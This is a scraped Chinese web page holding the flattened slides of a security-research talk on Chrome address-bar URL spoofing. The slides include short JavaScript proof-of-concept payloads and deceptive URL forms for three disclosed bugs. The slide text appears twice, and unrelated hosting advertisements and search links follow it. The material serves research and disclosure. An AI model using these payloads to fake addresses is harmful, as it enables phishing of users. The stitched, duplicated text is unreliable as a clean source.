浏览器地址栏之困
搜狗浏览器收藏夹在哪 时间:2021-02-23 阅读:()
腾讯玄武实验室徐少培(@xisigr)腾讯玄武实验室研究员Web安全研究浏览器安全研究《Web前端黑客技术揭秘》作者联系方式weibo.
com/xisigrxisigr.
comxisigr@gmail.
comWerecognizethattheaddressbaristheonlyreliablesecurityindicatorinmodernbrowsers.
--GoogleSecurityTeam[1][1]https://www.
google.
com/about/appsecurity/reward-program/HTTPS:网址左边的绿色符号对你意味着什么HTTP:网址左边的白色符号对你意味着什么[1]https://www.
usenix.
org/conference/soups2016/technical-sessions/presentation/porter-feltURL标准目前由whatwg维护[1]URL经过20多年的发展其定义在不断扩大,很多现代的主题也开始被URL规范所覆盖.
将URI[RFC3986][2]和IRI[RFC3987][3]与现代接轨,并逐步淘汰.
使得对'网址'一词进行标准化.
URL/URI/IRIURL的解析应该向HTML解析一样坚固[1]https://url.
spec.
whatwg.
org/[2]https://tools.
ietf.
org/html/rfc3986[3]https://tools.
ietf.
org/html/rfc3987伪造了Web最基本的安全边界,起源(orgin)Orgin=scheme+hostname+port但人们(包括开发人员)往往不了解起源的概念,而更倾向于理解主机(hostname)的概念.
UI简化:忽略scheme(或图标替换)/port(默认80)可伪造的主机包括什么域名[RFC1034]IP:IPv4[RFC791]/IPv6[RFC4291]只要伪造了主机,就可以认为这是一个URLSpoof漏洞.
URL中的任何一个部分,都有可能成为触发URLSpoof漏洞的攻击向量.
https://login.
your-bank.
com.
evil.
com/login.
your-bank.
com漏洞介绍漏洞名称ChromeAddressBarURLSpoofingOnIOS受影响产品Chromepayload="keypayload";functionpwned(){vart=window.
open('','new');t.
document.
write(atob(payload));}clickmekeypayloadSpoofvarlink=document.
createElement('a');link.
href='https://gmail.
com::';document.
body.
appendChild(link);link.
click();keypayload发生了什么①,跳转到一个新页面时,chrome允许对'https://gmail.
com::'进行加载.
这是错误的开始,加载了一个无效地址,并未对无效地址做任何处理②,页面开始加载'https://gmail.
com::',因加载的是一个无效的地址,于是地址栏处于一个挂起的状态(pendingentry).
③,当内容开始返回时,调用'about:blank',但此时chrome还处于一个挂起状态('https://gmail.
com::'),并且把'https://gmail.
com::'作为了最终的提交地址.
④,页面加载完毕.
一个URLSpoof漏洞诞生了.
漏洞介绍漏洞名称ChromeAddressBarURLSpoofingwithBlob-URLs受影响产品GoogleChromefunctionpwned(){vart=window.
open('','new');t.
document.
write("phishingpagegoogle");t.
stop();}clickme1clickme2keypayload(1)blob:http://www.
google.
com%EF%BE%A0…………@xisigr.
com//UnicodeU+FFA0(2)blob:http://www.
google.
com…………@xisigr.
com//空格keypayload发生了什么Chrome渲染了Blob-URLs的用户名和密码部分,这是极其危险的.
一个URL的用户名和密码不应该被渲染,因为它们可以被误认为是一个URL的主机.
https://examplecorp.
com@attacker.
example/Unicode字符(比如U+0020、U+FFA0),在Chrome地址栏中将显示空白.
大量的空白字符覆盖了真实的主机.
漏洞介绍漏洞名称ChromeAddressBarURLSpoofing受影响产品ChromeRightClickkeypayload(1)google.
com::(2)www.
google.
com::/urlq=http%3A%2F%2Fxisigr.
com%2Ftest%2Fspoof%2Fchrome%2F3.
html&sa=D&sntz=1&usg=AFQjCNG-QnLGG1ixIlOzlpZQn5cweSU3Cwkeypayload发生了什么通过右键在新窗口打开页面,Chrome允许加载(google.
com::)一个无效的地址.
加载(google.
com)返回页面,并将(google.
com:)作为最后提交地址.
之后的重定向不会触发(google.
com:)被更新加载完毕.
一个URLSpoof漏洞诞生了.
地址栏之困浏览器地址栏是个矛盾体,它提供两个相互竞争的角色:你在哪和你要去哪.
它只能显示其中的一个.
而地址栏恰是困于这两个角色的转换之中.
深刻理解地址栏之困,即是挖掘URLSpoof漏洞的核心奥义.
公众号和微博"腾讯玄武实验室"每天推送国际最新安全技术资料
com/xisigrxisigr.
comxisigr@gmail.
comWerecognizethattheaddressbaristheonlyreliablesecurityindicatorinmodernbrowsers.
--GoogleSecurityTeam[1][1]https://www.
google.
com/about/appsecurity/reward-program/HTTPS:网址左边的绿色符号对你意味着什么HTTP:网址左边的白色符号对你意味着什么[1]https://www.
usenix.
org/conference/soups2016/technical-sessions/presentation/porter-feltURL标准目前由whatwg维护[1]URL经过20多年的发展其定义在不断扩大,很多现代的主题也开始被URL规范所覆盖.
将URI[RFC3986][2]和IRI[RFC3987][3]与现代接轨,并逐步淘汰.
使得对'网址'一词进行标准化.
URL/URI/IRIURL的解析应该向HTML解析一样坚固[1]https://url.
spec.
whatwg.
org/[2]https://tools.
ietf.
org/html/rfc3986[3]https://tools.
ietf.
org/html/rfc3987伪造了Web最基本的安全边界,起源(orgin)Orgin=scheme+hostname+port但人们(包括开发人员)往往不了解起源的概念,而更倾向于理解主机(hostname)的概念.
UI简化:忽略scheme(或图标替换)/port(默认80)可伪造的主机包括什么域名[RFC1034]IP:IPv4[RFC791]/IPv6[RFC4291]只要伪造了主机,就可以认为这是一个URLSpoof漏洞.
URL中的任何一个部分,都有可能成为触发URLSpoof漏洞的攻击向量.
https://login.
your-bank.
com.
evil.
com/login.
your-bank.
com漏洞介绍漏洞名称ChromeAddressBarURLSpoofingOnIOS受影响产品Chromepayload="keypayload";functionpwned(){vart=window.
open('','new');t.
document.
write(atob(payload));}clickmekeypayloadSpoofvarlink=document.
createElement('a');link.
href='https://gmail.
com::';document.
body.
appendChild(link);link.
click();keypayload发生了什么①,跳转到一个新页面时,chrome允许对'https://gmail.
com::'进行加载.
这是错误的开始,加载了一个无效地址,并未对无效地址做任何处理②,页面开始加载'https://gmail.
com::',因加载的是一个无效的地址,于是地址栏处于一个挂起的状态(pendingentry).
③,当内容开始返回时,调用'about:blank',但此时chrome还处于一个挂起状态('https://gmail.
com::'),并且把'https://gmail.
com::'作为了最终的提交地址.
④,页面加载完毕.
一个URLSpoof漏洞诞生了.
漏洞介绍漏洞名称ChromeAddressBarURLSpoofingwithBlob-URLs受影响产品GoogleChromefunctionpwned(){vart=window.
open('','new');t.
document.
write("phishingpagegoogle");t.
stop();}clickme1clickme2keypayload(1)blob:http://www.
google.
com%EF%BE%A0…………@xisigr.
com//UnicodeU+FFA0(2)blob:http://www.
google.
com…………@xisigr.
com//空格keypayload发生了什么Chrome渲染了Blob-URLs的用户名和密码部分,这是极其危险的.
一个URL的用户名和密码不应该被渲染,因为它们可以被误认为是一个URL的主机.
https://examplecorp.
com@attacker.
example/Unicode字符(比如U+0020、U+FFA0),在Chrome地址栏中将显示空白.
大量的空白字符覆盖了真实的主机.
漏洞介绍漏洞名称ChromeAddressBarURLSpoofing受影响产品ChromeRightClickkeypayload(1)google.
com::(2)www.
google.
com::/urlq=http%3A%2F%2Fxisigr.
com%2Ftest%2Fspoof%2Fchrome%2F3.
html&sa=D&sntz=1&usg=AFQjCNG-QnLGG1ixIlOzlpZQn5cweSU3Cwkeypayload发生了什么通过右键在新窗口打开页面,Chrome允许加载(google.
com::)一个无效的地址.
加载(google.
com)返回页面,并将(google.
com:)作为最后提交地址.
之后的重定向不会触发(google.
com:)被更新加载完毕.
一个URLSpoof漏洞诞生了.
地址栏之困浏览器地址栏是个矛盾体,它提供两个相互竞争的角色:你在哪和你要去哪.
它只能显示其中的一个.
而地址栏恰是困于这两个角色的转换之中.
深刻理解地址栏之困,即是挖掘URLSpoof漏洞的核心奥义.
公众号和微博"腾讯玄武实验室"每天推送国际最新安全技术资料
Dynadot COM特价新注册48元
想必我们有一些朋友应该陆续收到国内和国外的域名注册商关于域名即将涨价的信息。大概的意思是说从9月1日开始,.COM域名会涨价一点点,大约需要单个9.99美元左右一个。其实对于大部分用户来说也没多大的影响,毕竟如今什么都涨价,域名涨一点点也不要紧。如果是域名较多的话,确实增加续费成本和注册成本。今天整理看到Dynadot有发布新的八月份域名优惠活动,.COM首年注册依然是仅需48元,本次优惠活动截止...
BuyVM老牌商家新增迈阿密机房 不限流量 月付2美元
我们很多老用户对于BuyVM商家还是相当熟悉的,也有翻看BuyVM相关的文章可以追溯到2014年的时候有介绍过,不过那时候介绍这个商家并不是很多,主要是因为这个商家很是刁钻。比如我们注册账户的信息是否完整,以及我们使用是否规范,甚至有其他各种问题导致我们是不能购买他们家机器的。以前你嚣张是很多人没有办法购买到其他商家的机器,那时候其他商家的机器不多。而如今,我们可选的商家比较多,你再也嚣张不起来。...
美国高防云服务器 1核 1G 26元/月 香港/日本站群服务器 E5 16G 1600元/月 触摸云
触摸云国内IDC/ISP资质齐全商家,与香港公司联合运营, 已超8年运营 。本次为大家带来的是双12特惠活动,美国高防|美国大宽带买就可申请配置升档一级[CPU内存宽带流量选一]升档方式:CPU内存宽带流量任选其一,工单申请免费升级一档珠海触摸云科技有限公司官方网站:https://cmzi.com/可新购免费升档配置套餐:地区CPU内存带宽数据盘价格购买地址美国高防 1核 1G10M20G 26...
搜狗浏览器收藏夹在哪为你推荐
-
网络明星网络明星是什么,出现这一现象的原因是什么深圳公交车路线深圳公交路线无线路由器限速设置wifi怎么设置限速拂晓雅阁?英特尔和AMD有什么区别啊?百度抢票浏览器手机百度浏览器抢票版根本就没预约抢票。噱头而已!公章制作在WOLD里怎样制作公章蘑菇街美丽说蘑菇街、美丽说这类网站前期是怎么推广的?小米手柄小米手柄怎么用?cisco防火墙思科路由器上自带防火墙功能吗?怎么在图片上写文字如何在图片上写字?